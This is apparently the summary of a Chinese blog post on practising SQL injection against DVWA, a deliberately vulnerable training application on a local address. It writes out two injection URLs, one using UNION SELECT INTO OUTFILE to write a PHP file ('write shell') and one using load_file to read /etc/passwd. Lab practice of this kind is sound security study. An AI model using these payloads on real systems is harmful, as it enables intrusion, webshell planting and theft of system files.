摘要:
下载了dvwa,对SQL注入进行演练。使用了以下语句:写shell:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,'hello'+into+outfile+'/tmp/tt32.php'++--+&Submit=Submit#读取文件:http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/?id='+union+select+2,load_file('/etc/passwd 阅读全文